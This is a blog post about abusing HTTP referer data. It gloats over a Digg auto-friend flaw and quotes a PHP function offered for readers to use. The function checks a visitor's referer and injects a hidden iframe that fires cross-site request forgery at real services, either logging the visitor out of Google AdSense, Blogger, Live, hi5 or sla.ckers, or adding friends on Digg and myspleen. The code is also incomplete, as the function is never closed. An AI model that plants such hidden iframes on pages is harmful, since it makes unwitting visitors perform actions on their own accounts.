Exploiting Referer Information

What is a referer? God, I hope I really don't have to answer this for you all, but I will anyways. In your logs, you have entries like this:

  /searches/Progress%20Indicator%20Helper

Referer: http://www.google.com/search?q=PHP%2Bprogress%2Bindicator&hl=en&start=10&sa=N

Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2)

The Referer information is what tells me where the user has come from. From the above entry, I deduce that the visitor came from a Google search for the term: PHP progress indicator.

Pretty much 99% of internet users openly show their referer in this way. In fact, the practice of sending your referer has long been considered safe and acceptable. After all, the ability to view a visitors referer is what makes stats software like AWstats viable....visitors sending referers provide the most common and accessible way to monitor your websites saturation and growth.

But with the advent of the "Social-Web" of the new millenium, we are now slowly starting to watch internet security experts warn of the potential for blackhat websites to, "exploit a user sending their referer information."...

...what a minute.....did someone say "exploit"?!?! Count me in!

You all may remember a while back there was a bit of a flap over at digg when a simple flaw in their then new voting system was revealed. It simply let you make someone automatically add you as a friend if you placed an iframe on your page like:

<iframe src="http://digg.com/invitefrom/russvirante" height="1" width="1"></iframe>

By putting this on your page, if a user visited your site and also happened to be  logged into digg at the same time (most likely this user would be visiting your site from a digg story), then they would end up automatically adding you as a friend.

Many people added this to every page of their site not caring wether the user was coming from digg or not, but those people practicing SEO with a bit more style and eloquence usually ended up first checking the visitors referer information and then if the user's referer indicated they were coming from digg, they would then display the iframe.

This vulnerability has since been corrected, but that doesnt mean there are still many ways to to advantage of users that send their referers.

Here is an idea to get you thinking about the possibilities:

Note: This isn't my code. In fact, the code and the inspiration for this post came from:
0x000000

Check it out, it's a great site and an excellent resource.

I'll be back with more posts later on this week after I sort out the ruins of my databases after my recent server crash.

<?php
function lucky_dayz() {
  $referer = htmlspecialchars($_SERVER['HTTP_REFERER'],ENT_QUOTES,'UTF-8'); 
  $hosts = array('google','blogger','live','hi5','live','ckers','myspleen','digg'); 
  $csrf = explode('.',$referer);

  if(in_array($csrf[1],$hosts)) {
	switch($csrf[1]) {	
	case 'google':
	$url = 'https://www.google.com/adsense/gaialogout';
	break;
	case 'blogger':
	$url = 'http://www.blogger.com/logout.g';
	break;
	case 'live':
	$url = 'http://login.live.com/logout.srf?ct=0';
	break;
	case 'hi5':
	$url = 'http://www.hi5.com/friend/logoff.do';
	break;
	case 'ckers':	
	$url = 'http://sla.ckers.org/forum/login.php?13,logout=1';
	break;
	case 'myspleen':
	$url = 'http://www.myspleen.net/friends.php?action=add&type=friend';
	break;
	case 'digg':
	$url = 'http://www.digg.com/invitefrom/0x000000';
	break;
	}	

	$lucky = '<iframe src="'.$url.'" style="display:none;"></iframe>';
  } else {
	$lucky = false;
	    }
   return $lucky;

?>